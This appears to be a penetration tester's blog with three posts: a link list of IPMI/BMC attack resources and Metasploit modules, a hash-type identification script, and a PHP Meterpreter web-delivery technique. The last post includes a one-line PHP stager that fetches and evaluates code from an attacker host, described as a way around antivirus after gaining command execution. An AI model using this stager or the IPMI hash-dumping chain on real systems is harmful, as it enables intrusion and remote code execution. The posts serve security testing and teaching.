Friday, March 27, 2015

IPMI and BMC Exploitation

A quick brain dump of resources/vulns/techniques for pwning IPMI devices:

Awesome work in this area by Rapid7, Dan Farmer, etc.

Educate yo-self

https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi

Discovery

http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version

Vulns

https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities

Exploits (MSF)

http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes
http://www.rapid7.com/db/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner
http://www.rapid7.com/db/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner
http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero
http://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes
http://www.rapid7.com/db/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure
http://server:49152/PSBlock

Other resources

http://fish2.com/ipmi/
https://community.rapid7.com/community/metasploit/blog/2013/11/15/exploiting-the-supermicro-onboard-ipmi-controller
blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras
https://pedromadias.wordpress.com/2012/06/25/all-your-asus-servers-ikvmipmi-may-belong-to-other/
http://blog.devicenull.org/2014/02/02/supermicro-ipmi-firmware-x8sil-f-analysis.html


 I will update with more coherence when I get more time....

Thursday, January 8, 2015

Password Hash Identifier

So I recently saw KoreLogic post a link to a password hash dump on pastebin located here: http://pastebin.com/A3JSbdzm

It was not a typical hash dump as it was not cracked or uncracked hashes, but hash types followed by examples. When faced with a funky password hash, I typically call upon john the ripper to do identification for me, however I have been in multiple scenarios where it is either unclear or john cannot identify the hash(es) I have. This pastebin dump was the kick in the pants I needed to write a tool of my own that attempts to identify the hash type of a given hash.

If an exact match cannot be found, the script will give you "possible" matches. I have incorporated the hash types mentioned above as well as the list from the hashcat site here: http://hashcat.net/wiki/doku.php?id=example_hashes

To use it you will need to download the python script and the associated hash list.

https://github.com/jakxx/Scripts/blob/master/hashes.py
https://github.com/jakxx/Scripts/blob/master/hashes.txt

Once you have them, usage is simple:

python hashes.py '[hash]'

An example can be seen below.


Cheers.

Friday, February 21, 2014

PHP Meterpreter Web Delivery

I recently found myself in a situation where I had command execution through a web application and but wanted to upgrade to a reverse shell that included Meterpreter functionality. I had two roadblocks as I needed to bypass antivirus and some of the local exe's were locked down, such as powershell (sadface), net commands, ipconfig, etc. (sidenote: shoutout to Chris (@obscuresec) for some great ideas on getting around locked down files)

After some research I was able to establish a simple PHP command and control-type scenario where the server would reach out to me and execute whatever code I specified on my attacking machine using a combination of eval and file_get_contents. This way it left a very small footprint (one line) on the target machine and I was able to execute larger blocks of code as my initial command execution bug was limited by length. The PHP code went something like this:

<?php eval(file_get_contents('http://attacker/boom.txt'); ?>

This way I had no size limitations and had access to all the functionality of PHP, which is quite a bit. I ended up enumerating the internal network using PHP to do things like scan ports, grab internal web pages, etc.

All this to say, it got me thinking and after a quick refresher, I dove back into ruby world to try to hack together a metasploit module that will automate this and provide the elusive meterpreter. The super flexible, ninja module structure credit goes to Ben Campbell (@meatballs__).

Simply configure the options



..and execute the printed command on the targeted system



Update*
I have added support for python and combined this module with the psh_web_delivery module. The resulting module has been merged into the metasploit framework. You can find the module here.